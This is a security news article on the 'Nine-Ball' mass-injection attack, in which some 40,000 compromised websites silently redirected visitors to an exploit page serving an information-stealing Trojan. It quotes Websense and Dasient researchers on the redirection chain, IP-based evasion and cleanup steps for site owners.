This site uses cookies. By continuing to browse this site you are agreeing to our use of cookies. Find out more.X

"Nine-Ball" mass injection attack compromised 40,000 sites

Share this article:

A new threat dubbed “Nine-Ball” has compromised up to 40,000 legitimate websites, which are, in turn, infecting users with an information-stealing Trojan, according to security vendor Websense.

The attack is called “Nine-Ball” because of the name of the final, malicious landing page, which is loaded with drive-by exploits, that unsuspecting users automatically are redirected to if they visit one of the compromised sites., the exploit site, contains malicious code that looks for already patched vulnerabilities in Acrobat Reader, QuickTime, Microsoft Data Access Components (MDAC) and AOL SuperBuddy, which it then attempts to exploit, Stephan Chenette, manager of security research at Websense, told on Wednesday.

The flaws have all been patched; some date back to 2006, Chenette said. But, the Reader and QuickTime vulnerabilities are newer, making it less likely that users are patched for them. If the malicious code finds an unpatched vulnerability to exploit, it either drops a malicious PDF file or a Trojan designed to steal user information, Chanette said.

All of the exploits currently have low detection rates, he added.

The 40,000 legit but compromised websites were “sleeping” up until Monday, Chanette said. Before then, if a user visited one of them, they were redirected to On Monday, though, the attack updated and users started being redirected to the ninetoraq malicious site.

Currently, users who visit one of the compromised sites are first sent through a chain of redirections before landing on the final exploit site ninetoraq. Though users simply see the normal content on the infected page, the redirections would occur in the background without their knowledge -- so a user would not see that they are on the ninetoraq site. By sending users through numerous redirections, it makes the job of tracking the attackers more difficult, Chanette said.

During the redirections, a visitor's IP address is recorded. If the IP address is determined to be new, the user is directed to the exploit payload site. But if the user's IP address has already been recorded, they are directed from the compromised site to the benign site -- which they would see happen, Chanette said.

The reason attackers have included this feature could be to evade security companies who are probing the infected sites and attempting to analyze the attack -- one might assume the attack no longer works, because they are being directed to a benign site.

Websense researchers determined that the compromised sites are not running a common piece of software, which means the sites have been injected with malicious code via stolen credentials that have been previously obtained.

Getting rid of the problem requires multiple steps, Chanette said. Website owners must look at their site's source code for obfuscated or scrambled code. Then they need to change the credentials to all accounts that can access that website.

Chanette said that none of the 40,000 infected sites for this particular attack are well-known brands.

“Attackers are going after quantity and not quality,” Chanette said. “If they go after big name websites, they are shut down faster.”

Over the past several months, there have been similar mass-injection attack waves like this every few weeks, Neil Daswani, co-founders of web anti-malware vendor Dasient, told Wednesday.

A similar threat, called Gumblar, made headlines recently for compromising approximately 60,000 legitimate websites. In addition, another mass-injection attack, Beladen, was said to have infected 40,000 websites.

Daswani said that in the past two years there has been a 600 percent increase in the number of trusted websites being used as malware distribution points. Compromised websites face a number of consequences, including being blacklisted by search engines, which typically causes a significant drop in traffic.

“Once they clean up, the challenge is to try and get back traffic,” Daswani said. “From businesses we have spoken to, once they clean up, it's very hard to get back to [the former] traffic level because there's a loss of consumer confidence.”

Share this article:

SC webcasts on demand

This is how to secure data in the cloud

Exclusive video webcast & Q&A sponsored by Vormetric

As enterprises look to take advantage of the cloud, they need to understand the importance of safeguarding their confidential and sensitive data in cloud environments. With the appropriate security safeguards, such as fine-grained access policies, a move to the cloud is as, or more, secure than an on-premise data storage.

View the webcast here to find out more

More in News

Google and Facebook offer free cyber-security tools

Google and Facebook offer free cyber-security tools

Google and Facebook have both launched free open-source cyber-security tools this week, designed to help security professionals spot malware and cyber-attacks.

Mixed results for key Government cyber-initiatives

Mixed results for key Government cyber-initiatives

The Government's Verify scheme to confirm IDs is behind scheuduled uptake, but its CISP threat intelligence sharing scheme is ahead of target.

Hundreds of companies face 2,000 cyber-attacks in EU exercise

Hundreds of companies face 2,000 cyber-attacks in EU ...

The European Network and Information Security Agency (ENISA) conducted a 24-hour cyber-exercise in which more than 200 organisations from 25 EU member states faced virtual cyber-attacks from white hat hackers ...